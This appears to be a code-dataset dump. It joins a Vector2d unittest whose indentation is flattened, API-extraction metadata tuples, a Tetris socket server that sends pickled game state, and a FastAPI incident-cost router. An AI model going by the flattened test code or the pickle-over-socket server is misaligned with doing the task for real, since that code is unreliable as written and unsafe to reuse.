v = v + Vector2d(1, 2)
self.assertTrue(v.equal(Vector2d(7, 9), 1e-4))
v += Vector2d(5, 6)
self.assertTrue(v.equal(Vector2d(12, 15), 1e-4))
# __sub__
v = v - Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(10, 11), 1e-4))
v.set(2, 4)
v -= Vector2d(1, 6)
self.assertTrue(v.equal(Vector2d(1, -2), 1e-4))
# __truediv__
v.set(10, 6)
v = v / Vector2d(2, 3)
self.assertTrue(v.equal(Vector2d(5, 2), 1e-4))
v.set(10, 6)
v /= Vector2d(2, 3)
self.assertTrue(v.equal(Vector2d(5, 2), 1e-4))
# __truediv__ int
v.set(10, 6)
v = v / 2
self.assertTrue(v.equal(Vector2d(5, 3), 1e-4))
v.set(10, 6)
v /= 2
self.assertTrue(v.equal(Vector2d(5, 3), 1e-4))
# __mul__
v.set(10, 6)
v = v * Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(20, 24), 1e-4))
v.set(10, 6)
v *= Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(20, 24), 1e-4))
# __mul__ int
v.set(10, 6)
v = v * 2
self.assertTrue(v.equal(Vector2d(20, 12), 1e-4))
v.set(10, 6)
v *= 2
self.assertTrue(v.equal(Vector2d(20, 12), 1e-4))
# is_finite
self.assertTrue(v.is_finite())
def test_max(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(0.3, 0.5)
vec3 = Vector2d(0.4, 0.2)
self.assertAlmostEqual(vec1.max(), 0.2)
self.assertAlmostEqual(vec3.max(), 0.4)
vec1.max(vec2)
self.assertAlmostEqual(vec1, Vector2d(0.3, 0.5))
vec1.max(vec3)
self.assertAlmostEqual(vec1, Vector2d(0.4, 0.5))
def test_min(self):
vec1 = Vector2d(0.3, 0.5)
vec2 = Vector2d(0.1, 0.2)
vec3 = Vector2d(0.05, 0.1)
self.assertAlmostEqual(vec1.min(), 0.3)
self.assertAlmostEqual(vec3.min(), 0.05)
vec1.min(vec2)
self.assertAlmostEqual(vec1, Vector2d(0.1, 0.2))
vec1.min(vec3)
self.assertAlmostEqual(vec1, Vector2d(0.05, 0.1))
def test_equal_tolerance(self):
# Test Equal function with specified tolerance
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-6))
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-3))
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-1))
self.assertTrue(Vector2d.ZERO.equal(Vector2d.ONE, 1))
self.assertTrue(Vector2d.ZERO.equal(Vector2d.ONE, 1.1))
def test_dot(self):
v = Vector2d(1, 2)
self.assertAlmostEqual(v.dot(Vector2d(3, 4)), 11.0)
self.assertAlmostEqual(v.dot(Vector2d(0, 0)), 0.0)
self.assertAlmostEqual(v.dot(Vector2d(1, 0)), 1.0)
self.assertAlmostEqual(v.dot(Vector2d(0, 1)), 2.0)
def test_correct(self):
vec1 = Vector2d(0, float("nan"))
vec2 = Vector2d(float("inf"), -1)
vec3 = Vector2d(10, -2)
vec1.correct()
vec2.correct()
vec3.correct()
self.assertAlmostEqual(vec1, Vector2d(0, 0))
self.assertAlmostEqual(vec2, Vector2d(0, -1))
self.assertAlmostEqual(vec3, Vector2d(10, -2))
def test_abs_dot(self):
v = Vector2d(1, -2)
self.assertAlmostEqual(v.abs_dot(Vector2d(3, 4)), 11.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(0, 0)), 0.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(1, 0)), 1.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(0, 1)), 2.0)
def test_add(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(1.1, 2.2)
vec3 = vec1
vec3 += vec2
self.assertAlmostEqual(vec1 + vec2, Vector2d(1.2, 2.4))
self.assertAlmostEqual(vec3, Vector2d(1.2, 2.4))
# Add zero
# Scalar right
self.assertEqual(vec1 + 0, vec1)
# Vector left and right
self.assertAlmostEqual(Vector2d.ZERO + vec1, vec1)
self.assertAlmostEqual(vec1 + Vector2d.ZERO, vec1)
# Addition assigment
vec4 = Vector2d(vec1)
vec4 += 0
self.assertEqual(vec4, vec1)
vec4 += Vector2d.ZERO
self.assertAlmostEqual(vec4, vec1)
# Add non-trivial scalar values left and right
self.assertEqual(vec1 + 2.5, Vector2d(2.6, 2.7))
vec1 = vec4
vec4 += 2.5
self.assertEqual(vec4, Vector2d(2.6, 2.7))
def test_sub(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(1.1, 2.2)
vec3 = vec2
vec3 -= vec1
self.assertAlmostEqual(vec2 - vec1, Vector2d(1.0, 2.0))
self.assertAlmostEqual(vec3, Vector2d(1.0, 2.0))
# Subtraction with zeros
# Scalar right
self.assertEqual(vec1 - 0, vec1)
# Vector left and right
self.assertAlmostEqual(Vector2d.ZERO - vec1, -vec1)
self.assertAlmostEqual(vec1 - Vector2d.ZERO, vec1)
# Subtraction assignment
vec4 = Vector2d(vec1)
vec4 -= 0
self.assertEqual(vec4, vec1)
vec4 -= Vector2d.ZERO
self.assertAlmostEqual(vec4, vec1)
# Subtract non-trivial scalar values left and right
self.assertEqual(vec1 - 2.5, -Vector2d(2.4, 2.3))
vec4 = vec1
vec4 -= 2.5
self.assertEqual(vec4, -Vector2d(2.4, 2.3))
def test_multiply(self):
v = Vector2d(0.1, -4.2)
vec2 = v * 2.0
self.assertEqual(vec2, Vector2d(0.2, -8.4))
vec2 *= 4.0
self.assertEqual(vec2, Vector2d(0.8, -33.6))
# Multiply by zero
# Scalar right
self.assertEqual(v * 0, Vector2d.ZERO)
# Element-wise vector multiplication
self.assertEqual(v * Vector2d.ZERO, Vector2d.ZERO)
# Multiply by one
# Scalar right
self.assertEqual(v * 1, v)
# Element-wise vector multiplication
self.assertEqual(v * Vector2d.ONE, v)
# Multiply by non-trivial scalar value
scalar = 2.5
expect = Vector2d(0.25, -10.5)
self.assertEqual(v * scalar, expect)
# Multiply by itself element-wise
v.set(0.1, 0.5)
self.assertAlmostEqual(v * v, Vector2d(0.01, 0.25))
    def test_length(self):
# Zero vector
self.assertAlmostEqual(Vector2d.ZERO.length(), 0.0)
self.assertAlmostEqual(Vector2d.ZERO.squared_length(), 0.0)
# One vector
self.assertAlmostEqual(Vector2d.ONE.length(),
math.sqrt(2), delta=1e-10)
self.assertAlmostEqual(Vector2d.ONE.squared_length(), 2.0)
# Arbitrary vector
v = Vector2d(0.1, -4.2)
self.assertAlmostEqual(v.length(), 4.20119030752, delta=1e-10)
self.assertAlmostEqual(v.squared_length(), 17.65)
# Integer vector
v = Vector2d(3, 4)
self.assertAlmostEqual(v.length(), 5)
self.assertAlmostEqual(v.squared_length(), 25)
def test_nan(self):
nanVec = Vector2d.NAN
self.assertFalse(nanVec.is_finite())
self.assertTrue(math.isnan(nanVec.x()))
self.assertTrue(math.isnan(nanVec.y()))
nanVec.correct()
self.assertEqual(Vector2d.ZERO, nanVec)
self.assertTrue(nanVec.is_finite())
nanVecF = Vector2f.NAN
self.assertFalse(nanVecF.is_finite())
self.assertTrue(math.isnan(nanVecF.x()))
self.assertTrue(math.isnan(nanVecF.y()))
nanVecF.correct()
self.assertEqual(Vector2f.ZERO, nanVecF)
self.assertTrue(nanVecF.is_finite())
if __name__ == '__main__':
unittest.main()
| [
"math.sqrt",
"ignition.math.Vector2d",
"ignition.math.Vector2d.ZERO.squared_length",
"unittest.main",
"ignition.math.Vector2d.ZERO.equal",
"ignition.math.Vector2d.ONE.length",
"ignition.math.Vector2d.ZERO.length",
"ignition.math.Vector2d.ONE.squared_length"
]
| [((9317, 9332), 'unittest.main', 'unittest.main', ([], {}), '()\n', (9330, 9332), False, 'import unittest\n'), ((786, 796), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (794, 796), False, 'from ignition.math import Vector2d\n'), ((898, 912), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (906, 912), False, 'from ignition.math import Vector2d\n'), ((1003, 1016), 'ignition.math.Vector2d', 'Vector2d', (['vec'], {}), '(vec)\n', (1011, 1016), False, 'from ignition.math import Vector2d\n'), ((1161, 1171), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (1169, 1171), False, 'from ignition.math import Vector2d\n'), ((1252, 1266), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1260, 1266), False, 'from ignition.math import Vector2d\n'), ((1689, 1703), 'ignition.math.Vector2d', 'Vector2d', (['(6)', '(7)'], {}), '(6, 7)\n', (1697, 1703), False, 'from ignition.math import Vector2d\n'), ((1876, 1890), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(6)'], {}), '(5, 6)\n', (1884, 1890), False, 'from ignition.math import Vector2d\n'), ((2089, 2103), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(6)'], {}), '(1, 6)\n', (2097, 2103), False, 'from ignition.math import Vector2d\n'), ((2325, 2339), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(3)'], {}), '(2, 3)\n', (2333, 2339), False, 'from ignition.math import Vector2d\n'), ((2771, 2785), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (2779, 2785), False, 'from ignition.math import Vector2d\n'), ((3156, 3174), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3164, 3174), False, 'from ignition.math import Vector2d\n'), ((3190, 3208), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3198, 3208), False, 'from ignition.math import Vector2d\n'), ((3224, 3242), 'ignition.math.Vector2d', 'Vector2d', (['(0.4)', '(0.2)'], {}), '(0.4, 0.2)\n', (3232, 3242), False, 'from ignition.math import Vector2d\n'), ((3542, 3560), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3550, 3560), False, 'from ignition.math import Vector2d\n'), ((3576, 3594), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3584, 3594), False, 'from ignition.math import Vector2d\n'), ((3610, 3629), 'ignition.math.Vector2d', 'Vector2d', (['(0.05)', '(0.1)'], {}), '(0.05, 0.1)\n', (3618, 3629), False, 'from ignition.math import Vector2d\n'), ((4344, 4358), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (4352, 4358), False, 'from ignition.math import Vector2d\n'), ((4723, 4739), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(-2)'], {}), '(10, -2)\n', (4731, 4739), False, 'from ignition.math import Vector2d\n'), ((5014, 5029), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(-2)'], {}), '(1, -2)\n', (5022, 5029), False, 'from ignition.math import Vector2d\n'), ((5324, 5342), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (5332, 5342), False, 'from ignition.math import Vector2d\n'), ((5358, 5376), 'ignition.math.Vector2d', 'Vector2d', (['(1.1)', '(2.2)'], {}), '(1.1, 2.2)\n', (5366, 5376), False, 'from ignition.math import Vector2d\n'), ((5821, 5835), 'ignition.math.Vector2d', 'Vector2d', (['vec1'], {}), '(vec1)\n', (5829, 5835), False, 'from ignition.math import Vector2d\n'), ((6209, 6227), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (6217, 6227), False, 'from ignition.math import 
Vector2d\n'), ((6243, 6261), 'ignition.math.Vector2d', 'Vector2d', (['(1.1)', '(2.2)'], {}), '(1.1, 2.2)\n', (6251, 6261), False, 'from ignition.math import Vector2d\n'), ((6725, 6739), 'ignition.math.Vector2d', 'Vector2d', (['vec1'], {}), '(vec1)\n', (6733, 6739), False, 'from ignition.math import Vector2d\n'), ((7122, 7141), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(-4.2)'], {}), '(0.1, -4.2)\n', (7130, 7141), False, 'from ignition.math import Vector2d\n'), ((7758, 7779), 'ignition.math.Vector2d', 'Vector2d', (['(0.25)', '(-10.5)'], {}), '(0.25, -10.5)\n', (7766, 7779), False, 'from ignition.math import Vector2d\n'), ((8371, 8390), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(-4.2)'], {}), '(0.1, -4.2)\n', (8379, 8390), False, 'from ignition.math import Vector2d\n'), ((8558, 8572), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (8566, 8572), False, 'from ignition.math import Vector2d\n'), ((1792, 1806), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1800, 1806), False, 'from ignition.math import Vector2d\n'), ((1983, 1997), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (1991, 1997), False, 'from ignition.math import Vector2d\n'), ((2220, 2234), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(3)'], {}), '(2, 3)\n', (2228, 2234), False, 'from ignition.math import Vector2d\n'), ((2664, 2678), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (2672, 2678), False, 'from ignition.math import Vector2d\n'), ((3401, 3419), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3409, 3419), False, 'from ignition.math import Vector2d\n'), ((3482, 3500), 'ignition.math.Vector2d', 'Vector2d', (['(0.4)', '(0.5)'], {}), '(0.4, 0.5)\n', (3490, 3500), False, 'from ignition.math import Vector2d\n'), ((3789, 3807), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3797, 3807), False, 'from ignition.math import Vector2d\n'), ((3870, 3889), 'ignition.math.Vector2d', 'Vector2d', (['(0.05)', '(0.1)'], {}), '(0.05, 0.1)\n', (3878, 3889), False, 'from ignition.math import Vector2d\n'), ((4008, 4048), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1e-06)'], {}), '(Vector2d.ONE, 1e-06)\n', (4027, 4048), False, 'from ignition.math import Vector2d\n'), ((4074, 4114), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(0.001)'], {}), '(Vector2d.ONE, 0.001)\n', (4093, 4114), False, 'from ignition.math import Vector2d\n'), ((4140, 4178), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(0.1)'], {}), '(Vector2d.ONE, 0.1)\n', (4159, 4178), False, 'from ignition.math import Vector2d\n'), ((4205, 4241), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1)'], {}), '(Vector2d.ONE, 1)\n', (4224, 4241), False, 'from ignition.math import Vector2d\n'), ((4267, 4305), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1.1)'], {}), '(Vector2d.ONE, 1.1)\n', (4286, 4305), False, 'from ignition.math import Vector2d\n'), ((4848, 4862), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (4856, 4862), False, 'from ignition.math import Vector2d\n'), ((4901, 4916), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(-1)'], {}), '(0, -1)\n', (4909, 4916), False, 'from ignition.math import Vector2d\n'), ((4955, 4971), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(-2)'], {}), '(10, -2)\n', (4963, 4971), 
False, 'from ignition.math import Vector2d\n'), ((5464, 5482), 'ignition.math.Vector2d', 'Vector2d', (['(1.2)', '(2.4)'], {}), '(1.2, 2.4)\n', (5472, 5482), False, 'from ignition.math import Vector2d\n'), ((5521, 5539), 'ignition.math.Vector2d', 'Vector2d', (['(1.2)', '(2.4)'], {}), '(1.2, 2.4)\n', (5529, 5539), False, 'from ignition.math import Vector2d\n'), ((6057, 6075), 'ignition.math.Vector2d', 'Vector2d', (['(2.6)', '(2.7)'], {}), '(2.6, 2.7)\n', (6065, 6075), False, 'from ignition.math import Vector2d\n'), ((6149, 6167), 'ignition.math.Vector2d', 'Vector2d', (['(2.6)', '(2.7)'], {}), '(2.6, 2.7)\n', (6157, 6167), False, 'from ignition.math import Vector2d\n'), ((6349, 6367), 'ignition.math.Vector2d', 'Vector2d', (['(1.0)', '(2.0)'], {}), '(1.0, 2.0)\n', (6357, 6367), False, 'from ignition.math import Vector2d\n'), ((6406, 6424), 'ignition.math.Vector2d', 'Vector2d', (['(1.0)', '(2.0)'], {}), '(1.0, 2.0)\n', (6414, 6424), False, 'from ignition.math import Vector2d\n'), ((7197, 7216), 'ignition.math.Vector2d', 'Vector2d', (['(0.2)', '(-8.4)'], {}), '(0.2, -8.4)\n', (7205, 7216), False, 'from ignition.math import Vector2d\n'), ((7270, 7290), 'ignition.math.Vector2d', 'Vector2d', (['(0.8)', '(-33.6)'], {}), '(0.8, -33.6)\n', (7278, 7290), False, 'from ignition.math import Vector2d\n'), ((7930, 7950), 'ignition.math.Vector2d', 'Vector2d', (['(0.01)', '(0.25)'], {}), '(0.01, 0.25)\n', (7938, 7950), False, 'from ignition.math import Vector2d\n'), ((8033, 8055), 'ignition.math.Vector2d.ZERO.length', 'Vector2d.ZERO.length', ([], {}), '()\n', (8053, 8055), False, 'from ignition.math import Vector2d\n'), ((8093, 8123), 'ignition.math.Vector2d.ZERO.squared_length', 'Vector2d.ZERO.squared_length', ([], {}), '()\n', (8121, 8123), False, 'from ignition.math import Vector2d\n'), ((8183, 8204), 'ignition.math.Vector2d.ONE.length', 'Vector2d.ONE.length', ([], {}), '()\n', (8202, 8204), False, 'from ignition.math import Vector2d\n'), ((8237, 8249), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (8246, 8249), False, 'import math\n'), ((8295, 8324), 'ignition.math.Vector2d.ONE.squared_length', 'Vector2d.ONE.squared_length', ([], {}), '()\n', (8322, 8324), False, 'from ignition.math import Vector2d\n'), ((1336, 1346), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (1344, 1346), False, 'from ignition.math import Vector2d\n'), ((1436, 1464), 'ignition.math.Vector2d', 'Vector2d', (['(0.447214)', '(0.894427)'], {}), '(0.447214, 0.894427)\n', (1444, 1464), False, 'from ignition.math import Vector2d\n'), ((1540, 1554), 'ignition.math.Vector2d', 'Vector2d', (['(4)', '(5)'], {}), '(4, 5)\n', (1548, 1554), False, 'from ignition.math import Vector2d\n'), ((1638, 1652), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1646, 1652), False, 'from ignition.math import Vector2d\n'), ((1736, 1750), 'ignition.math.Vector2d', 'Vector2d', (['(6)', '(7)'], {}), '(6, 7)\n', (1744, 1750), False, 'from ignition.math import Vector2d\n'), ((1839, 1853), 'ignition.math.Vector2d', 'Vector2d', (['(7)', '(9)'], {}), '(7, 9)\n', (1847, 1853), False, 'from ignition.math import Vector2d\n'), ((1923, 1939), 'ignition.math.Vector2d', 'Vector2d', (['(12)', '(15)'], {}), '(12, 15)\n', (1931, 1939), False, 'from ignition.math import Vector2d\n'), ((2030, 2046), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(11)'], {}), '(10, 11)\n', (2038, 2046), False, 'from ignition.math import Vector2d\n'), ((2136, 2151), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(-2)'], {}), '(1, -2)\n', (2144, 2151), False, 
'from ignition.math import Vector2d\n'), ((2267, 2281), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(2)'], {}), '(5, 2)\n', (2275, 2281), False, 'from ignition.math import Vector2d\n'), ((2372, 2386), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(2)'], {}), '(5, 2)\n', (2380, 2386), False, 'from ignition.math import Vector2d\n'), ((2493, 2507), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(3)'], {}), '(5, 3)\n', (2501, 2507), False, 'from ignition.math import Vector2d\n'), ((2585, 2599), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(3)'], {}), '(5, 3)\n', (2593, 2599), False, 'from ignition.math import Vector2d\n'), ((2711, 2727), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(24)'], {}), '(20, 24)\n', (2719, 2727), False, 'from ignition.math import Vector2d\n'), ((2818, 2834), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(24)'], {}), '(20, 24)\n', (2826, 2834), False, 'from ignition.math import Vector2d\n'), ((2937, 2953), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(12)'], {}), '(20, 12)\n', (2945, 2953), False, 'from ignition.math import Vector2d\n'), ((3031, 3047), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(12)'], {}), '(20, 12)\n', (3039, 3047), False, 'from ignition.math import Vector2d\n'), ((4396, 4410), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (4404, 4410), False, 'from ignition.math import Vector2d\n'), ((4456, 4470), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (4464, 4470), False, 'from ignition.math import Vector2d\n'), ((4515, 4529), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (4523, 4529), False, 'from ignition.math import Vector2d\n'), ((4574, 4588), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(1)'], {}), '(0, 1)\n', (4582, 4588), False, 'from ignition.math import Vector2d\n'), ((5072, 5086), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (5080, 5086), False, 'from ignition.math import Vector2d\n'), ((5136, 5150), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (5144, 5150), False, 'from ignition.math import Vector2d\n'), ((5199, 5213), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (5207, 5213), False, 'from ignition.math import Vector2d\n'), ((5262, 5276), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(1)'], {}), '(0, 1)\n', (5270, 5276), False, 'from ignition.math import Vector2d\n'), ((6967, 6985), 'ignition.math.Vector2d', 'Vector2d', (['(2.4)', '(2.3)'], {}), '(2.4, 2.3)\n', (6975, 6985), False, 'from ignition.math import Vector2d\n'), ((7060, 7078), 'ignition.math.Vector2d', 'Vector2d', (['(2.4)', '(2.3)'], {}), '(2.4, 2.3)\n', (7068, 7078), False, 'from ignition.math import Vector2d\n')] |
import pickle
import socket
import _thread
from scripts.multiplayer import game, board, tetriminos
server = "192.168.29.144"
port = 5555
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((server, port))
except socket.error as e:
print(e)
s.listen()
print("Waiting for connection")
connected = set()
games = {}
idCount = 0
def threaded_client(conn, p, gameId):
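    # Per-client thread: send the player index, then serve each received
    # command by updating the shared Game object and replying with the
    # pickled game state until the client disconnects.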
global idCount
conn.send(str.encode(str(p)))
reply = ""
while True:
try:
data = conn.recv(4096).decode()
if gameId in games:
game = games[gameId]
if not data:
break
else:
game.update(p, data)
reply = game
conn.sendall(pickle.dumps(reply))
else:
break
        except Exception:
break
print("Lost Connection!")
try:
del games[gameId]
print("Closing Game", gameId)
    except KeyError:
pass
idCount -= 1
conn.close()
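# Main accept loop: every two accepted connections share one game; the
# second player marks the game as ready.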
while True:
conn, addr = s.accept()
print("Connected to: ", addr)
idCount += 1
p = 0
game_id = (idCount - 1) // 2
if idCount % 2 == 1:
games[game_id] = game.Game((0, 0, 0), None, board)
else:
games[game_id].ready = True
p = 1
_thread.start_new_thread(threaded_client, (conn, p, game_id))
| [
"scripts.multiplayer.game.update",
"socket.socket",
"pickle.dumps",
"scripts.multiplayer.game.Game",
"_thread.start_new_thread"
]
| [((143, 192), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (156, 192), False, 'import socket\n'), ((1335, 1396), '_thread.start_new_thread', '_thread.start_new_thread', (['threaded_client', '(conn, p, game_id)'], {}), '(threaded_client, (conn, p, game_id))\n', (1359, 1396), False, 'import _thread\n'), ((1236, 1269), 'scripts.multiplayer.game.Game', 'game.Game', (['(0, 0, 0)', 'None', 'board'], {}), '((0, 0, 0), None, board)\n', (1245, 1269), False, 'from scripts.multiplayer import game, board, tetriminos\n'), ((701, 721), 'scripts.multiplayer.game.update', 'game.update', (['p', 'data'], {}), '(p, data)\n', (712, 721), False, 'from scripts.multiplayer import game, board, tetriminos\n'), ((789, 808), 'pickle.dumps', 'pickle.dumps', (['reply'], {}), '(reply)\n', (801, 808), False, 'import pickle\n')] |
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from dispatch.database.core import get_db
from dispatch.database.service import common_parameters, search_filter_sort_paginate
from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency
from .models import (
IncidentCostCreate,
IncidentCostPagination,
IncidentCostRead,
IncidentCostUpdate,
)
from .service import create, delete, get, update
router = APIRouter()
@router.get("", response_model=IncidentCostPagination)
def get_incident_costs(*, common: dict = Depends(common_parameters)):
"""
Get all incident costs, or only those matching a given search term.
"""
return search_filter_sort_paginate(model="IncidentCost", **common)
@router.get("/{incident_cost_id}", response_model=IncidentCostRead)
def get_incident_cost(*, db_session: Session = Depends(get_db), incident_cost_id: int):
"""
Get an incident cost by id.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
return incident_cost
@router.post(
"",
response_model=IncidentCostRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def create_incident_cost(
*, db_session: Session = Depends(get_db), incident_cost_in: IncidentCostCreate
):
"""
Create an incident cost.
"""
incident_cost = create(db_session=db_session, incident_cost_in=incident_cost_in)
return incident_cost
@router.put(
"/{incident_cost_id}",
response_model=IncidentCostRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def update_incident_cost(
*,
db_session: Session = Depends(get_db),
incident_cost_id: int,
incident_cost_in: IncidentCostUpdate,
):
"""
Update an incident cost by id.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
incident_cost = update(
db_session=db_session,
incident_cost=incident_cost,
incident_cost_in=incident_cost_in,
)
return incident_cost
@router.delete(
"/{incident_cost_id}",
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def delete_incident_cost(*, db_session: Session = Depends(get_db), incident_cost_id: int):
"""
Delete an incident cost, returning only an HTTP 200 OK if successful.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
delete(db_session=db_session, incident_cost_id=incident_cost_id)
| [
"fastapi.HTTPException",
"fastapi.APIRouter",
"dispatch.auth.permissions.PermissionsDependency",
"dispatch.database.service.search_filter_sort_paginate",
"fastapi.Depends"
]
| [((494, 505), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (503, 505), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((604, 630), 'fastapi.Depends', 'Depends', (['common_parameters'], {}), '(common_parameters)\n', (611, 630), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((732, 791), 'dispatch.database.service.search_filter_sort_paginate', 'search_filter_sort_paginate', ([], {'model': '"""IncidentCost"""'}), "(model='IncidentCost', **common)\n", (759, 791), False, 'from dispatch.database.service import common_parameters, search_filter_sort_paginate\n'), ((909, 924), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (916, 924), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1437, 1452), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (1444, 1452), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1876, 1891), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (1883, 1891), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2579, 2594), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (2586, 2594), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1120, 1211), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (1133, 1211), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2138, 2229), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (2151, 2229), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2832, 2923), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (2845, 2923), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1319, 1376), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), '([SensitiveProjectActionPermission])\n', (1340, 1376), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n'), ((1754, 1811), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), 